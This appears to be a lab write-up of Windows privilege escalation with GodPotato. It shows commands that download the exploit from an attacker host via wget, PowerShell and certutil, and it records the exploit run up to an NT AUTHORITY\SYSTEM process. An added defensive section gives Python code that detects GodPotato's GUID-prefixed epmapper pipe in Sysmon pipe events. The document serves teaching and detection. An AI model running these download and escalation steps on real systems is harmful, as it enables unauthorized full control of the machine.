Found that the current user has the SeImpersonatePrivilege privilege enabled, so GodPotato can be used directly for privilege escalation.
# Download
wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe
cmd /c powershell (New-Object Net.WebClient).DownloadFile('http://10.10.14.86/GodPotato-NET4.exe','GodPotato-NET4.exe')
certutil -f -split -urlcache http://10.10.14.86/GodPotato-NET4.exe
PS C:\Windows\system32> whoami /priv

PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
>>>> SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
PS C:\users\public> ./GodPotato-NET4.exe -cmd "cmd /c whoami"
[*] CombaseModule: 0x140722987991040
[*] DispatchTable: 0x140722990582088
[*] UseProtseqFunction: 0x140722989873984
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\d6f7c505-da5e-482f-817a-762b55d7f6a4\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00008002-150c-ffff-6c31-89948fe64697
[*] DCOM obj OXID: 0x55d73fc18250f058
[*] DCOM obj OID: 0x386a599045f1bbd4
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 916 Token:0x764 `User: NT AUTHORITY\SYSTEM `ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 4436
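From the defender's side, the most distinctive artifact in the output above is the named pipe GodPotato creates: a GUID-prefixed path ending in \pipe\epmapper, impersonating the RPCSS endpoint mapper. The following is an added example, not code from the original writeup or from GodPotato; it runs a detection check over constructed Sysmon Event ID 17 (Pipe Created) records, assuming the usual Sysmon convention that PipeName is recorded without the \\.\pipe\ prefix.

```python
import re

# Constructed, simplified Sysmon records (not real telemetry). The second record
# mirrors the pipe name GodPotato printed in the session above; the field names
# follow Sysmon's Event ID 17 (PipeEvent / Pipe Created) schema.
SAMPLE_EVENTS = [
    {"EventID": 17, "Image": r"C:\Windows\System32\svchost.exe", "PipeName": r"\epmapper"},
    {"EventID": 17, "Image": r"C:\users\public\GodPotato-NET4.exe",
     "PipeName": r"\d6f7c505-da5e-482f-817a-762b55d7f6a4\pipe\epmapper"},
    {"EventID": 17, "Image": r"C:\Windows\System32\svchost.exe", "PipeName": r"\lsass"},
    {"EventID": 1,  "Image": r"C:\users\public\GodPotato-NET4.exe", "PipeName": ""},
]

# The genuine endpoint mapper pipe is "\epmapper". GodPotato's fake one is
# "\<GUID>\pipe\epmapper": the random GUID prefix is the tell (assumption based
# on the CreateNamedPipe line in the tool output above).
GUID = r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}"
FAKE_EPMAPPER = re.compile(r"^\\" + GUID + r"\\pipe\\epmapper$", re.IGNORECASE)


def is_fake_epmapper(pipe_name: str) -> bool:
    """True when a pipe name looks like a GodPotato-style epmapper decoy."""
    return bool(FAKE_EPMAPPER.match(pipe_name))


def find_potato_pipes(events):
    """Return (Image, PipeName) for each Pipe Created event whose name matches
    the decoy pattern; the creating Image is what an analyst pivots on next."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 17:
            continue  # only Pipe Created events carry a meaningful PipeName here
        if is_fake_epmapper(ev.get("PipeName", "")):
            hits.append((ev["Image"], ev["PipeName"]))
    return hits


if __name__ == "__main__":
    for image, pipe in find_potato_pipes(SAMPLE_EVENTS):
        print(f"suspicious epmapper decoy pipe {pipe} created by {image}")
```

The same pattern can be expressed as a SIEM rule on Sysmon Event ID 17 with a PipeName regex; the legitimate \epmapper pipe and unrelated pipes do not match.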